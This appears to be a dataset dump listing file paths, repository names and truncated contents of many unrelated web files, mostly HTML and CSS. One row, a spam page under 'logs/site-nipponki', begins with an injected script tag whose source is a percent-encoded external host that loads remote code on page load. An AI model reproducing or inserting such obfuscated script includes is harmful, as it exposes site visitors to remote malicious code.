path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
paginas/Componentes/votos/votar.html | felipelvrd/K-Heal | <!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Documento sin título</title>
<link rel="stylesheet" type="text/css" href="votos.css">
<script type="text/javascript" src="votos.js"></script>
</head>
<body>
<div id='dvVotos' title="Me Cure">
<div id='dvMecure'> <a href="#" onClick="votar('P',2... |
src/a.css | xinlingever/NewBook | #canvas{
font-size: 48px;
font-family: serif;
}
#host{
width: 1000px;
height: 650px;
}
#progress{
width:100%;
height: 10px;
display:flex;
}
.nav-button{
width:100px;
height:40px;
}
|
readme_files/css/113-readme.html | lalo/readme-fads | <div class="announce instapaper_body md" data-path="README.md" id="readme"><article class="markdown-body entry-content" itemprop="mainContentOfPage"><p><a href="https://camo.githubusercontent.com/6ea48bf8e57beb2983a47b4e43968a8326e90238/68747470733a2f2f302e67726176617461722e636f6d2f6176617461722f63386165373430633062356... |
docs/SimpletestDocumentation/drupal-simpletest/html/search/classes_6e.html | chachasikes/TwinCitiesTestSprint | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title></title>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<link rel="stylesheet" type="text/css" href="search.css"/>
<script type="text/javascript" src="search... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jquery/tryitab86.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jquery/tryit.asp?filename=tryjquery_traversing_closest_dom by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:15:56 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( na... |
modules/contrib/environment_indicator/css/environment_indicator.css | davidlfg/d8-study | #environment-indicator {
text-align: center;
white-space: nowrap;
color: white;
text-shadow: 0 -1px 1px #333;
font-weight: bold;
z-index: 10;
left: 0;
right: 0;
padding: 5px;
background-image: linear-gradient(bottom, rgba(207,207,207,0.3) 19%, rgba(250,250,250,0.3) 60%, rgba(255,255,255,0.3) 80%);
... |
style.css | richardplacide/techcontinuum1_s | /*
Theme Name: techcontinuum1_s
Theme URI: http://underscores.me/
Author: Richard Placide
Author URI: http://ww.techcontinuum.com/
Description: Description
Version: 1.0
License: GNU General Public License
License URI: license.txt
Tags:
*/
/* =Reset
-------------------------------------------------------------- */
h... |
src/lesson/templates/lesson/lessons_list.html | chenzeyuczy/keba | {% extends "base/base.html" %}
{% block import %}
{% load staticfiles %}
<link href="{% static 'lesson/css/lessons_list.css' %}" rel="stylesheet" type="text/css">
{% endblock import %}
{% block main %}
<div class="panel panel-primary lesson-panel">
<div class="panel-heading">
<h6>课程查询</h6>
</div>
... |
css/math.css | LInE-IME-USP/iGraf2 | /*
* LaTeX Math in pure HTML and CSS -- No images whatsoever
* v0.xa
* by Jay and Han
* Lesser GPL Licensed: http: //www.gnu.org/licenses/lgpl.html
*
* This file is automatically included by mathquill.js
*
*/
@font-face {
font-family: Symbola;
src: url(font/Symbola.eot);
src: local("Symbola Regular"), loc... |
sites/all/libraries/yui/api/files/dataschema_js_dataschema-json.js.html | artefactual-labs/trac | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>dataschema/js/dataschema-json.js - YUI 3</title>
<link rel="stylesheet" href="http://yui.yahooapis.com/3.7.0/build/cssgrids/cssgrids-min.css">
<link rel="stylesheet" href="../assets/v... |
modules/mod_community_hellome/style.css | Creativetech-Solutions/joomla-easysocial-network | .joms-module__body .joms-module--hellome {
margin: -14px;
}
.joms-module--hellome .joms-hcard {
width: 100%;
border: 0;
}
.joms-list--hellome li span {
display: table-cell;
width: 40px;
text-align: right;
}
.joms-module--hellome .joms-list--hellome li {
padding: 8px 14px;
... |
doc/api/classes/ActionController/Metal.html | aaronfi/chess-es6-demo | <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>ActionController::Metal</title>
<meta http-equiv="Content-Type" c... |
include/themes/dark/main.css | micke2k/cacti | /* main styles */
::-webkit-scrollbar {
width: 8px;
}
::-webkit-scrollbar-track {
-webkit-box-shadow: inset 0 0 6px rgba(22,22,6,0.7);
border-radius: 6px;
}
::-webkit-scrollbar-thumb {
border-radius: 6px;
background: rgba(49,68,43,0.8);
-webkit-box-shadow: inset 0 0 4px rgba(49,68,43,0.5);
... |
toolchain/arm_cm0/share/doc/gcc-arm-none-eabi/html/gdb/Types-In-Guile.html | jocelynmass/nrf51 | <html lang="en">
<head>
<title>Types In Guile - Debugging with GDB</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Debugging with GDB">
<meta name="generator" content="makeinfo 4.8">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Guile-API.html#G... |
vendor/assets/dhtmlx/docsExplorer/dhtmlxwindows/dhtmlxwindows___api_method_dhtmlxwindows_setviewport.html | ManageIQ/dhtmlx-rails | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir="ltr">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" href="../codebase/default.css"... |
wp-includes/googleapis/css.css | laiy/CMS-SDCS | @font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 300;
src: local('Open Sans Light'), local('OpenSans-Light'), url(DXI1ORHCpsQm3Vp6mXoaTegdm0LZdjqr5-oayXSOefg.woff2) format('woff2'), url(DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff) format('woff');
}
@font-face {
font-family: 'Open S... |
Unity/Outsided Content/Documentation - Create GUI/classes.html | SKSKSUnite/OZone-GameRealm | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
src/main/assets/files/2495.html | heriniaina/fihirana-katolika | <html><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><link rel='stylesheet' type='text/css' href='../tononkira.css' /></head><body><ul class="hira-fihirana-list"><li style="color: red;"><b>Antsao ny Tompo</b> <i>p. 332</i></li></ul><p class='auteur'><i>Marc sy Dieudonné</i></p><p>Izao no did... |
tests/testcases_output/html/large_test/warning_value_member_tags.TMyClass.html | michaliskambi/pasdoc | <!DOCTYPE html>
<html lang="en">
<head>
<title>warning_value_member_tags: Class TMyClass</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<link rel="StyleSheet" type="text/css" href="pasdoc.css">
</head>
<body>
<table class=... |
doc/index-files/index-18.html | hypknowsys/WUMprep4Weka | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_04) on Sun Oct 30 19:56:12 CET 2005 -->
<TITLE>
T-Index
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../stylesheet.css" TITLE="Style">
<... |
_variables/pluginsettings.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Variable Reference: $pluginsettings</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-pr... |
www/addons/lrj_guide/recouse/css/search_new.css | xianhuachang/one | /*index643973929211478*/
@charset "utf-8";
body{
color: #525252;
background-color: #f4f4f4;
}
a{
color: #525252;
}
input{
border: none;
font-family: 微软雅黑;
color: #a4a4a4;
}
.tab .frame{
height: 51px;
border-left: 4px solid #ec5b4a;
position: fixed;
top: 107px;
background-color: #fff;
z-index: 99!important;
... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryit45bd.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_script_src by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:34:52 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.userAg... |
wulu/2015.11.23/qipai/buyu/269.html | bylu/Test | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>³¬Éù²¨²¶ÓãÆ÷</title>
<meta name="keywords" content="³¬Éù²¨²¶ÓãÆ÷" />
<meta name="description" content="ÏÖÔ... |
初级/10-日期对象、网页时钟、倒计时/图片时钟实例.html | linxiaoyan/learning_javascript | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>图片时钟效果</title>
</head>
<body>
<div id="time-box">
<img src="" />
<img src="" />
<img src="" />
<img src="" />
<img src="" />
<img src="" />
<img src="" />
<img src="" />
</div>
<script>
window.onload = function () {
var oTimeD... |
myodd/boost/libs/asio/doc/html/boost_asio/reference/basic_seq_packet_socket/do_not_route.html | FFMG/myoddweb.piger | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>basic_seq_packet_socket::do_not_route</title>
<link rel="stylesheet" href="../../../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.79.1">
<link rel="home" href="../... |
wp-content/themes/wordpress-bootstrap/membership-email-billing_failure.html | oniiru/html | <html>
<body bgcolor="#d9d9d9" style="background-image:url(images/bodyBG.gif);background-repeat: repeat-y no-repeat;background-position: top center;background-color: #d9d9d9;margin:0;padding:0;color:#000000;font-size:15px;font-family:Arial, Helvetica, sans-serif;">
<div style="margin:0 auto; width:600px;">
<table cel... |
linearAlgebra/matrix9.html | chenhuaizhen/chenhuaizhen.github.io | <!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>正交 = 垂直?</title>
<link rel="shortcut icon" type="image/x-icon" href="../favicon.ico" />
<link rel="stylesheet" type="text/css" href="../css/main.css">
</head>
<body>
<div class='ctx'>
<h1 class="header">机器学习入门---线性代数篇</h1>
<div class='time'>
撰写:CHE... |
Seminar_partIV.html | a-cellofan/BasicCpp | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name=... |
_layouts/post.html | 28circle/28circle.github.io | ---
layout: layout
---
<div class="post">
<header class="post-header">
<span itemprop="name"><h1 class="post-title"><center>{{ page.title }}</center></h1></span>
<p class="post-meta"><center>{{ page.date | date: "%-d %b %Y" }}{% if page.meta %} • {{ page.meta }}{% endif %}</center></p>
</header>
<... |
default/public/plugins/datatables/extensions/TableTools/examples/pdf_message.html | slrondon/WispCenter | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<link rel="shortcut icon" type="image/ico" href="http://www.datatables.net/favicon.ico">
<meta name="viewport" content="initial-scale=1.0, maximum-scale=2.0">
<title>TableTools example - PDF message</title>
<link rel="stylesheet" type="text/css" href="../../../... |
FECG-EncuentraRaizPuntoFijo/FECG-EncuentraRaizPuntoFijo.html | Franko1307/AnalisisNumerico |
<!--
Nombre: FECG-EncuentraRaizPuntoFijo.html
Fecha: 15/9/2015
Autor : Francisco Enrique Cordova Gonzalez
Descripcion: Este programa genera aproximaciones a raices de ecuaciones con punto fijo y ademas grafica la ecuacion.
-->
<!DOCTYPE HTML>
<html>
<head>
<title>FECG-EncuentraRaizPuntoFijo</title>
... |
hasil.html | thexzan/Infoktp | <!DOCTYPE HTML>
<html>
<head>
<meta charset="UTF-8">
<title>Cek keaslian data KTP - InfoKTP</title>
<link rel="stylesheet" type="text/css" href="style.css">
<link rel="icon" type="image/ico" href="favicon.ico">
</head>
<body>
<div id="wrapper">
<div id="logo">
<h1>info<span>KTP</span></h1>
<h2>Cek Keaslian Dat... |
html/ref.detail.html | cria/microSICol | <!-- ref.detail.html -->
<div id="above_data">
<p>
<a href="javascript:show('general');" id="tab_general" class="on_menu">%(menu_References_General)s</a>
<a href="javascript:show('security');" id="tab_security">%(menu_References_Security)s</a>
</p>
</div>
<div class="data" id="general">
... |
public/css/style.css | onedr0p/manage-this-node | /* --------------------------------
Primary style
-------------------------------- */
*, *::after, *::before {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
*::after, *::before {
content: '';
}
body {
font-size: 0px;
font-family: "PT Sans", sans-serif;
}
a {
tex... |
Code/GetMetaDataFromCRAN/raw_html/l2boost.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package l2boost</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; c... |
client/main.html | benderskiy/svetashead | <head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width" />
<title>Svetashead</title>
</head>
<!-- THEN GOES LAYOUT (layout.html) --> |
client/vtr/listvtr.html | laskuvarjotoimikunta/vtr | <template name="listVtr">
<div class="pull-right"><a href="{{pathFor 'exportVtr'}}">Export</a></div>
{{#with ownVtr}}
{{#if count}}
<div class="page-header">
<h1>Omat ilmoituksesi ({{count}} kpl)</h1>
</div>
{{#each this}}
{{>itemVtr}}
{{/each}}
{{/if}}
{{/with}}... |
wp-content/themes/justwrite/assets/css/es-style6.css | bechirbenhammed/critiques | /* Editor Style - Font Style 6 */
body{font-family:"Open Sans",sans-serif;}
h1,h2,h3,h4,h5,h6{font-family:"Roboto Slab",sans-serif;} |
doc/fltneq.html | bmajoros/Epsilon | <h2>Float::notEqual: N</h2>
<br><b>Description:</b>
<br>Returns <i>false</i> if self's floating-point value is equal to
the value of N; <i>true</i> otherwise. N must be a Float object,
<i>not</i> an <a href="integer.html">Integer</a>.
<p><b>Return value:</b> true or false |
boost/doc/html/boost/date_time/time_zone_names_base.html | geodynamics/gale | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>Class template time_zone_names_base</title>
<link rel="stylesheet" href="../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../index.ht... |
css/eva.css | dolfinitylearning/eva | /** {
margin: 0;
padding: 0;
}
body {
font-family: sans-serif;
padding: 1em;
}
p {
margin-top: 0.5em;
margin-bottom: 1em;
}*/
.eva-wrapper {
margin-top: 2em;
margin-bottom: 2em;
}
.eva-spreadsheet {
padding: 5px;
border: 2px solid #C7C4C4;
margin-left: 5px;
margin-right: 5px;
}
.ev... |
_site-archive/post/7007134732/rack-mounted-mining/index.html | sunnankar/bitcoinminer | <html><head><link rel="canonical" href="/2017/02/10/2011-06-28-rack-mounted-mining.html"><meta http-equiv="refresh" content="0; url=/2017/02/10/2011-06-28-rack-mounted-mining.html"></head><body></body></html>
|
gramps50/addons/example_DynamicWeb2/place.html | belissent/testing-example-reports | <!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>Place - My Family Tree</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name="apple-mobile-web-app-capab... |
InstantWP_4.4.2/iwpserver/server/Apache/manual/programs/httxt2dbm.html | Timfreaky/ThinkTax | # GENERATED FROM XML -- DO NOT EDIT
URI: httxt2dbm.html.en
Content-Language: en
Content-type: text/html; charset=ISO-8859-1
|
doc/api/jade/domain/FIPAAgentManagement/package-summary.html | LeeboyOver9000/TCC | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="it">
<head>
<!-- Generated by javadoc (version 1.7.0_03) on Tue Dec 09 10:56:12 CET 2014 -->
<title>jade.domain.FIPAAgentManagement (JADE v4.3.3 API)</title>
<meta name="date" conten... |
doc/html/redboot-guide/brutus.html | satlantis/Ecos | <!-- Copyright (C) 2009 Free Software Foundation, Inc. -->
<!-- This material may be distributed only subject to the terms -->
<!-- and conditions set forth in the Open Publication License, v1.0 -->
<!-- or later (the latest version is presently available at -->
<!-- http:/... |
wp-content/plugins/amazon-auto-links/include/v2/asset/css/aal_templates.css | ashik968/digiplot | .widefat td {
vertical-align: middle;
}
.column-thumbnail {
width: 20%;
}
.disabled {
color: #C5C5C5;
}
.right-button {
float: right;
}
.template-thumbnail{
position: relative;
z-index: 0;
}
.template-thumbnail:hover{
background-color: transparent;
z-index: 50;
}
.template-thumbnail span{ ... |
arduino/libraries/CmdMessenger/Documentation/PC/html/functions_0x6f.html | jgrizou/robot_2WD | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>CmdMessenger: Class... |
_site/sublime/2015/03/26/sublimeLinter.html | lyf1986/lyf1986.github.io | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>代码校验工具 SublimeLinter 的安装与使用</title>
<meta name="description" content="代码校验工具 sublimeLinter 的安装与使用,jshint 的安装与使用,JavaScript ... |
app/assets/partials/doc/chromosome-entries.html | calipho-sib/nextprot-ui | <link href='../../elements/nextprot-elements/chromosome-entry-view.html' rel='import' type='text/html'>
<link href='../../elements/nextprot-elements/chromosome-list-view.html' rel='import' type='text/html'>
<div id="kentries" class="vertical-section-container centered">
<div class="col-xs-12 col-lg-12 main" ng-con... |
profiles/crm_core_np/modules/crm_core_features/crm_core_donation/modules/crm_core_donation_lb/crm_core_donation_lb.css | Trellon/crmcoredemo | /**
* Css page
*/
#donation_leader {
margin-top: 20px;
border-bottom: 1px solid grey;
padding-bottom:10px;
overflow:hidden;
}
#donation_leader .position {
font-size:64px;
font-weight:bold;
float:left;
border: 1px solid grey;
padding:20px 15px;
height:95px;
}
#donation_leader .picture {
float:left;
margin-left: 5px... |
docs/html/PackageTestCondition.html | electric-cloud/installjammer | <!-- saved from url=(0014)about:internet -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><TITLE>Package Test Condition</TITLE><meta name="generator" content="Fast-Help"><meta name="keywords" content="Package Test Condition">
<meta http-equiv="Content-Style-Type" content="text/css">
<... |
inc/tools/views/_email_sent_details.view.php.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Detail view of _email_sent_details.view.php</title>
<link rel="stylesheet" href="../../../sample.css" type="text/css">
<link rel="stylesheet" href... |
gramps42/gramps/example_NAVWEB1/ppl/w/w/0GDKQC54XKSWZKEBWW.html | belissent/testing-example-reports | <!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>My Family Tree - Howell, John</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-... |
hot_tub/css/css_gsOI4Kqy10_vEIBjw6RkLziqMsEcM8RouEB0E5Parkc.css | mikeusry/Gemini | .ds-2col-fluid > .group-left{float:left;width:50%;}.ds-2col-fluid > .group-right{float:right;width:50%;}.ds-2col-fluid.group-one-column > .group-left,.ds-2col-fluid.group-one-column > .group-right{width:100%;float:none;}
.print-link{display:block;text-align:right;padding-bottom:0.5em;}div#block-print-ui-print-links spa... |
logs/site-nipponki/02021711794.html | ForAEdesWeb/AEW25 | <script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×... |
web/templates/404.html | agrif/osubus | {% extends "base.html" %}
{% block title %}Page not Found{% endblock %}
{% block base_content %}
<h1>Page not Found</h1>
<p>The page you're looking for wasn't found. Likely, this is due to a mistyped link or moved page. If you feel that this page really <em>should</em> exist, drop me a line at <a href="mailto:griffi... |
coflo-0.0.4/third_party/boost_1_48_0/doc/html/boost_asio/reference/basic_socket_acceptor/local_endpoint.html | charlesDGY/coflo | <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<title>basic_socket_acceptor::local_endpoint</title>
<link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css">
<meta name="generator" content="DocBook XSL Stylesheets V1.76.1">
<link rel="home" href="../../../... |
css/styles_original.css | Edutictac/secretictac | .menu{
font-family: Arial, Helvetica, sans-serif;
padding:0;
list-style:none;
width:200px;
font-size:12px;
background:#efebf6;
border: 1px solid rgba(0,0,0,0.8);
float:left;
margin-right: 20px;
min-height: 650px;
height: auto !important;
height: 650px;
}
.menu li a{
... |
src/main/resources/viewer/BigWarpHelp.html | saalfeldlab/bigwarp | <!--
#%L
BigWarp plugin for Fiji.
%%
Copyright (C) 2015 - 2021 Howard Hughes Medical Institute.
%%
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 2 of the
License, or... |
docs/classArSocket-members.html | charismaticchiu/Robotics | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<title>Aria: Member List</title>
<link href="doxygen.css" rel="stylesheet" type="text/css">
</head><body>
<!-- Generated by Doxygen 1.4.2 -->
<div class="qindex"><a class="... |
inc/admin/admin-page-class/css/Admin_Page_Class.css | yaroslav-belinsky/Advenced-Custom-Tabs-Woocommerce | /**
* admin pages class
*
* CSS used for the admin pages class and other form items.
*
* Copyright 2011 Ohad Raz (admin@bainternet.info)
*/
/* =Common Rules for all fields.
----------------------------------------------- */
.form-table td.at-field{ border: 1px solid #DDD; padding: 10px 10px 20px; margin: 0px; fo... |
doc/com/online/lakeshoremarket/model/partner/package-frame.html | elliottpost/lakeshoremarket | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_66) on Tue Dec 08 01:24:03 CST 2015 -->
<title>com.online.lakeshoremarket.model.partner</title>
<meta name="date" content="2015-12-08">
<link r... |
www/index2.html | NatePW/KeyTracker | <!DOCTYPE html>
<!--
Copyright (c) 2012-2014 Adobe Systems Incorporated. All rights reserved.
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. ... |
Code/GetMetaDataFromCRAN/raw_html/Voss.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package Voss</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; char... |
wp-content/themes/outdoor_cinema/fonts/lovelo_black-demo.html | timjdaniel/outdoor-cinema | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="http://ajax.googleapis.com/ajax/libs... |
example/input/00001-about/00000-about.html | mortie/housecat | <!--author: mort@example.com (mort)
description: privacy breech
-->
<h1>About Me</h1>
<p>I'm a guy and/or gal. Lorem ipsum.</p>
|
ipol_demo-light-1025b85/app_available/46/template/input.html | juan-cardelino/matlab_demos | <%include file="header.html" />
<%include file="input_form_select.html" />
<%include file="footer.html" />
|
html/bottlecount.com/about.html | randomstring/Websites | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML><HEAD><TITLE>About BottleCount.Com</TITLE>
<META NAME="description" CONTENT="A free online wine cellar organizer.">
<META NAME="keywords" CONTENT="Wine, cellar, organizer, UPC scanning, easy, free">
<META NAME="copyright" CONTENT="Copyright 2000-2003 Bryn Dole">
<BAS... |
doc/api/classes/DateAndTime/Calculations.html | aaronfi/chess-es6-demo | <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>DateAndTime::Calculations</title>
<meta http-equiv="Content-Type"... |
wp-content/plugins/gravityforms/js/components/form_editor/conditional_flyout/views/flyout.html | MinnPost/minnpost-wordpress | <aside class="conditional_logic_flyout">
<button class="conditional_logic_flyout__close" data-js-close-flyout>
<span class="screen-reader-text">Close Conditional Logic Settings Modal</span>
<i class="conditional_logic_flyout__close_icon" data-js-close-flyout ></i>
</button>
<header class="conditional_logic_flyou... |
doc/html/structifbpstpconf.html | diy19901030/lldpd | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>lldp: ifbpstpconf S... |
toolchain/arm_cm0/share/doc/gcc-arm-none-eabi/html/gcc/Half_002dPrecision.html | jocelynmass/nrf51 | <html lang="en">
<head>
<title>Half-Precision - Using the GNU Compiler Collection (GCC)</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="Using the GNU Compiler Collection (GCC)">
<meta name="generator" content="makeinfo 4.8">
<link title="Top" rel="start" href="index.html#T... |
lucene-5.1.0/docs/analyzers-common/org/apache/lucene/analysis/util/class-use/CharacterUtils.CharacterBuffer.html | marcialhernandez/TecnologiasWeb | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_67) on Thu Apr 09 10:31:52 MDT 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="utf-8">
<title>Uses of Class org.a... |
gcc-linaro/share/doc/gfortran/Directory-Options.html | SubhrajyotiSen/HelioxKernelHarpia | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<!-- Copyright (C) 1999-2016 Free Software Foundation, Inc.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3 or
any later... |
blakearchive/static/html/comment.html | blakearchive/archive | <!--<div class="col-sm-9 col-sm-offset-3 content-right-column">-->
<div class="row">
<div class="col-sm-10">
<!--<h2 class="title">User Comments</h2>-->
<table align="center" border="0" cellpadding="0" cellspacing="8" width="50%">
<tbo... |
sites/all/modules/drupal_wall/css/drupal_wall.css | katel/datatales | /**
* @file
* Styles sheet for the Drupal wall module.
*/
/* @group drupal_wall class */
.drupal_wall_post_status {
background-color: white;
-webkit-border-radius: 3px;
-moz-border-radius: 3px;
-ms-border-radius: 3px;
-o-border-radius: 3px;
border-radius: 3px;
-webkit-box-shadow: #858585 1px 1px 4px;... |
public/tags/c++/page/1/index.html | knausb/knausb.github.io | <!DOCTYPE html><html><head><title>https://knausb.github.io/tags/c++/</title><link rel="canonical" href="https://knausb.github.io/tags/c++/"/><meta name="robots" content="noindex"><meta charset="utf-8" /><meta http-equiv="refresh" content="0; url=https://knausb.github.io/tags/c++/" /></head></htm... |
demo/jqm/index20141103.html | hkoudai/bbb | <!DOCTYPE html>
<html class="">
<head>
